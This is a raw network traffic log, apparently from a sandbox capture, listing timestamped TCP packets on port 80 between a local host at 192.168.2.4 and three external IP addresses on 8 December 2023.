                                                                                                                                                            Dec 8, 2023 14:53:06.840662956 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840662956 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840697050 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840747118 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840747118 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840841055 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840878010 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840884924 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840920925 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840924025 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840956926 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840962887 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840996981 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841013908 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841033936 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841039896 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841072083 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841072083 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841114044 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841124058 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841154099 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841248989 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841285944 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841291904 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841332912 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841445923 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841485023 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841489077 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841522932 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841531038 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841559887 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841567993 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841599941 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841660023 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841696978 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841706991 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841741085 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841794968 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841833115 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841840982 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841893911 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841898918 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841947079 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:07.638525009 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:07.878132105 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:07.878204107 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:07.878715038 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:08.118304968 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:08.118623972 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:08.118704081 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:08.118716002 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:08.118769884 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:08.118923903 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.144088984 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.144112110 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.144154072 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.144190073 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.144232035 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.144270897 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.144350052 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.144428015 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.144469023 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.144531965 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.144624949 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.144659996 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.144694090 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.144754887 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.144789934 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.383884907 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.383913040 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.383994102 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.384004116 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.384115934 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.384161949 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.384195089 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.384265900 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.384306908 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.384366035 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.384437084 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.384476900 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.384531975 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.384628057 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.384670973 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.384680986 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.384814024 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.384852886 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.384957075 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.385045052 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.385078907 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.385128021 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.385229111 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.385267019 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.385345936 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.385411024 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.385458946 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.385500908 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.385602951 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.385637045 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.388151884 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.623620033 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.623645067 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.623707056 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.623754978 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.623769045 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.623804092 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.623811960 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.623863935 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.623898029 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.623933077 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.623969078 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624001026 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624037027 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624068022 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624100924 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624145031 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624186039 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624216080 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624248028 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624265909 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624295950 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624326944 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624360085 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624366045 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624397993 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624427080 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624461889 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624481916 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624516964 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624546051 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624578953 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624641895 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624679089 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624707937 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624742031 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624771118 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624806881 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624835968 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624872923 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624902010 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.624936104 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.624983072 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625016928 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625055075 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625088930 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625106096 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625139952 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625200033 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625236034 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625292063 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625360012 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625370979 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625403881 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625432014 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625466108 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625503063 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625535011 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625535965 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625597000 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625618935 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625633955 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625659943 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625694036 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625724077 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625756025 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625757933 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625797987 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625848055 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625884056 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625926971 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.625960112 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.625979900 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.626013994 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.626035929 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.626070976 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.626086950 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.626120090 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.626136065 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.626173019 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:09.626226902 CET8049783185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:09.626261950 CET4978380192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:10.404602051 CET4978480192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:10.644002914 CET8049784185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:10.644129992 CET4978480192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:10.644355059 CET4978480192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:10.882977962 CET8049784185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:11.383486032 CET8049784185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:11.383511066 CET8049784185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:11.383719921 CET4978480192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:11.384020090 CET4978480192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:11.624509096 CET8049784185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:18.189718962 CET4978580192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:18.315365076 CET8049785107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:18.315545082 CET4978580192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:18.315771103 CET4978580192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:18.441553116 CET8049785107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:18.642144918 CET8049785107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:18.642203093 CET8049785107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:18.642337084 CET4978580192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:19.826370001 CET4978580192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:20.841763973 CET4978680192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:20.966993093 CET8049786107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:20.967094898 CET4978680192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:20.967322111 CET4978680192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:21.093918085 CET8049786107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:21.291337967 CET8049786107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:21.294703007 CET8049786107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:21.294732094 CET8049786107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:21.294888020 CET4978680192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:22.481982946 CET4978680192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:23.498985052 CET4978780192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:23.624866009 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.625058889 CET4978780192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:23.626859903 CET4978780192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:23.752962112 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.752986908 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.752998114 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753009081 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753066063 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753087997 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753192902 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753204107 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753226995 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.953020096 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.953039885 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.953108072 CET4978780192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:25.138149977 CET4978780192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.154042006 CET4978880192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.279249907 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.279342890 CET4978880192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.280189991 CET4978880192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.405200005 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606383085 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606403112 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606487036 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606501102 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606513977 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606528044 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606741905 CET4978880192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.606955051 CET4978880192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.732121944 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:32.081887007 CET4978980192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:32.316426039 CET804978937.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:32.316590071 CET4978980192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:32.316797972 CET4978980192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:32.552953959 CET804978937.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:32.553061008 CET4978980192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:33.825727940 CET4978980192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:34.841806889 CET4979080192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:35.076452971 CET804979037.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:35.076554060 CET4979080192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:35.076858044 CET4979080192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:35.313324928 CET804979037.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:35.313414097 CET4979080192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:36.594357014 CET4979080192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:37.607178926 CET4979180192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:37.846836090 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:37.847064018 CET4979180192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:37.848824024 CET4979180192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:38.088474989 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088500977 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088511944 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088526011 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088537931 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088548899 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088624954 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088664055 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088669062 CET4979180192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:38.088741064 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.328205109 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.372870922 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.611691952 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.611780882 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.611998081 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.852206945 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852233887 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852252960 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852272034 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852313042 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852364063 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852443933 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852505922 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.852505922 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.852509022 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852539062 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852555990 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.852638960 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852688074 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091236115 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091258049 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091272116 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091291904 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091311932 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091324091 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091331959 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091351032 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091370106 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091388941 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091391087 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091408014 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091420889 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091428995 CET804979237.97.254.27192.168.2.4
